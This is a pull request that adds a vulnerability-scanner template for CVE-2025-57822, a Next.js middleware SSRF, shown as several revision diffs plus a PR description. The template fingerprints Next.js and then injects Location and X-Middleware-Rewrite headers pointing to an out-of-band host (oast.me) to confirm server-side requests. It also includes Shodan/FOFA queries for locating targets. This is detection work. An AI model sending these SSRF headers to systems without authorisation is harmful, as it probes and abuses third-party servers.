### PR TITLE
Add template for CVE-2025-57822

### DIFF
--- a/http/cves/2025/CVE-2025-57822.yaml
+++ b/http/cves/2025/CVE-2025-57822.yaml
@@ -22,10 +22,10 @@ info:
     shodan-query:
       - cpe:"cpe:2.3:a:zeit:next.js"
       - http.html:"/_next/static"
-      - x-middleware-rewrite
+      - x-forwarded-
     fofa-query:
       - body="/_next/static"
-      - x-middleware-rewrite
+      - x-forwarded-
   tags: cve,cve2025,ssrf,nextjs
 
 variables:

--- a/http/cves/2025/CVE-2025-57822.yaml
+++ b/http/cves/2025/CVE-2025-57822.yaml
@@ -47,7 +47,7 @@ http:
 
   - method: GET
     path:
-      - "{{BaseURL}}?cb={{cache-buster}}"
+      - "{{BaseURL}}/?cb={{cache-buster}}"
 
     headers:
       Location: "https://oast.me"

--- a/http/cves/2025/CVE-2025-57822.yaml
+++ b/http/cves/2025/CVE-2025-57822.yaml
@@ -1,0 +1,57 @@
+id: CVE-2025-57822-nextjs-ssrf
+
+info:
+  name: Next.js Middleware SSRF
+  author: prdngr,nicolas-latacora
+  severity: medium
+  description: |
+    In Next.js prior to versions 14.2.32 and 15.4.7, when request headers
+    were insecurely passed to NextResponse.next(), an attacker could exploit
+    this behavior to perform Server-Side Request Forgery (SSRF) attacks.
+  reference:
+    - https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-57822
+    - https://vercel.com/changelog/cve-2025-57822
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2025-57822
+    cwe-id: CWE-918
+  metadata:
+    verified: true
+    vendor: vercel
+    product: next.js
+  tags: cve,cve2025,ssrf,nextjs
+
+variables:
+  interactsh: "{{interactsh-url}}"
+  cache-buster: "{{rand_text_alpha(10)}}"
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}"
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "_next/static"
+        internal: true
+
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}?cb={{cache-buster}}"
+    headers:
+      Location: "https://{{interactsh}}"
+      X-Middleware-Rewrite: "https://{{interactsh}}"
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"

--- a/http/cves/2025/CVE-2025-57822.yaml
+++ b/http/cves/2025/CVE-2025-57822.yaml
@@ -22,11 +22,9 @@ info:
     shodan-query:
       - cpe:"cpe:2.3:a:zeit:next.js"
       - http.html:"/_next/static"
-      - x-forwarded-
     fofa-query:
       - body="/_next/static"
-      - x-forwarded-
-  tags: cve,cve2025,ssrf,nextjs
+  tags: cve,cve2025,ssrf,nextjs,oast,oob
 
 variables:
   cache-buster: "{{rand_text_alpha(10)}}"

--- a/http/cves/2025/CVE-2025-57822.yaml
+++ b/http/cves/2025/CVE-2025-57822.yaml
@@ -1,17 +1,15 @@
-id: CVE-2025-57822-nextjs-ssrf
+id: CVE-2025-57822
 
 info:
-  name: Next.js Middleware SSRF
+  name: Next.js Middleware - Server-Side Request Forgery
   author: prdngr,nicolas-latacora
   severity: medium
   description: |
-    In Next.js prior to versions 14.2.32 and 15.4.7, when request headers
-    were insecurely passed to NextResponse.next(), an attacker could exploit
-    this behavior to perform Server-Side Request Forgery (SSRF) attacks.
+    In Next.js prior to versions 14.2.32 and 15.4.7, when request headerswere insecurely passed to NextResponse.next(), an attacker could exploit this behavior to perform Server-Side Request Forgery (SSRF) attacks.
   reference:
     - https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-57822
     - https://vercel.com/changelog/cve-2025-57822
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-57822
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
     cvss-score: 6.5
@@ -21,20 +19,27 @@ info:
     verified: true
     vendor: vercel
     product: next.js
+    shodan-query:
+      - cpe:"cpe:2.3:a:zeit:next.js"
+      - http.html:"/_next/static"
+      - x-middleware-rewrite
+    fofa-query:
+      - body="/_next/static"
+      - x-middleware-rewrite
   tags: cve,cve2025,ssrf,nextjs
 
 variables:
-  interactsh: "{{interactsh-url}}"
   cache-buster: "{{rand_text_alpha(10)}}"
 
 flow: http(1) && http(2)
 
 http:
   - method: GET
-    redirects: true
-    max-redirects: 3
     path:
       - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 3
     matchers:
       - type: word
         part: body
@@ -43,15 +48,17 @@ http:
         internal: true
 
   - method: GET
-    redirects: true
-    max-redirects: 3
     path:
       - "{{BaseURL}}?cb={{cache-buster}}"
+
     headers:
-      Location: "https://{{interactsh}}"
-      X-Middleware-Rewrite: "https://{{interactsh}}"
+      Location: "https://oast.me"
+      X-Middleware-Rewrite: "https://oast.me"
+
+    host-redirects: true
+    max-redirects: 3
     matchers:
       - type: word
-        part: interactsh_protocol
+        part: body
         words:
-          - "http"
+          - "<h1> Interactsh Server </h1>"


### PR DESCRIPTION
### Template / PR Information

This PR adds a template for CVE-2025-57822 - an SSRF condition caused by misconfigured Next.js middleware components. The template functions as follows:

1. A first request checks whether the web application at _BaseURL_ is a Next.js application, by looking for the string *_next/static* in the response body.
2. If the first request successfully determined that _BaseURL_ points to a Next.js application, a second request is performed, triggering the SSRF by supplying Interactsh URLs in the `Location` and `X-Middleware-Rewrite` headers.
3. The success condition for the template is an HTTP interaction with Interactsh.

- Added CVE-2025-57822
- References:
  - https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f
  - https://nvd.nist.gov/vuln/detail/CVE-2025-57822
  - https://vercel.com/changelog/cve-2025-57822

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO